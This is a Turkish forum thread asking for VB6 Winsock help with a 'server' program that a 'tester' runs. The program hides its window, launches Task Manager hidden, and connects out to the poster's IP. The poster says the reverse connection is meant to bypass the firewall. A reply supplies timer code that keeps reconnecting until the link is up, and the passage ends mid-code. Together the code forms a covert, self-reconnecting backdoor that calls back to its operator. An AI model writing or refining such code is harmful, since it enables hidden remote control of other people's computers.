Vb6.0 Soket Programlama Yardım.
-
herkeze sa,
şimdi server program var die kabul ediorum formun load bölümüne
Private Sub Form_Load()
Winsock1.RemoteHost = txt_remoteip.Text
Winsock1.RemotePort = txt_remoteport.Text
Winsock1.Connect
Me.Hide
Shell "taskmgr.exe", vbHide
End Subbu kodları yazıorum . yazdıgım clienti calistiorum testerada serverı actırorum . baglanti saglanio işte işlemlerimi yapabilirorum amma velakin eger tester ben clienti açmadan serverı acarsa benle baglantı kuramıyor. ben şöle bişi olmasını istiorum, tester serverı actıgı zmn 5 dkda 1
Winsock1.Connectşu kodları tekrarlayacak yani tekrardan benle baglantı kurcak
baya bi araştırdım timer ile olabilir die düsünüroumda nasıl olcagını bilimiorum.
veya if ile baglantı varsa hiç bi işlem yapma yok ise tekrardan baglanmaya calis. işte bunu bi türlü yapamadım bi yardım etseniz güzel olur şimdiden saolun :)
-
millet noluonuz ya eskiden bi yardım konusu acardık 2 sayfa yardım msjları yagardı. ilgi olurdu . şimdi kimse bakmıo bile illa full c/p mi yapmamız lazım yardım için :@
up !
-
as hocam.
Anlatmak istedigini tam olarak anlyamadim.Clienti sen , serveri tester mi acior?
Her neyse yinede timerle o isi nası yapcani anlatim.
'Bi timer ekle timer1 oldunu farzedelim.
'interval i 60 yap ki bu 1 dk olur . Illa 5 dk yapcam diyosan da 60 yaz timerin in interval ozelligine ve buyur kod:
'Formun General declerations bölümüne
Private x as byte
Private Sub Form_Load()
x=0
End Sub
Private Sub Timer1_Timer()
select case x
case 4
Winsock1.Connectx=0
exit sub
end select
x=x+1
End Sub
herhangi bir sorun olursa sorabilirsin
-
öncelikle soruya cvp verdigin için saolasın .
bide cleinti sen serverı testermı acıosun die sormuşsun evet aynen öle firewall olayını atlamak için öle düsündüm :). şimdi kodumuz saglam calisio ancak bi sorun var. mesala 5 snyede bi olayı gercekleştiriyor ya ama şöle oluo önce testera serverı actırıorum ardından clieinti aciorum 5 snye sora baglanti oluo , ama 5 sn ye sora server hata verio. şöle bişi yapabilirmiyiz ? cliente baglanana kadar 5 snyede bi denesin cliente baglandıkdan sora timer1.enabled olsun gibi bişiler ?
-
'hocam az once verdigim kod uzerinde istedigini gosterecegim.
'Eger 5 dk icinde baglanti kopmussa yeniden baglancak intervali kendin ayarlarsin.
Private x as byte
Private Sub Form_Load()
x=0
End Sub
Private Sub Timer1_Timer()
select case x
case 4
if Winsock1.state <> 7 then 'baglanti yoksa
if winsock1.state <> sckclosed then Winsock1.close
Winsock1.Connectx=0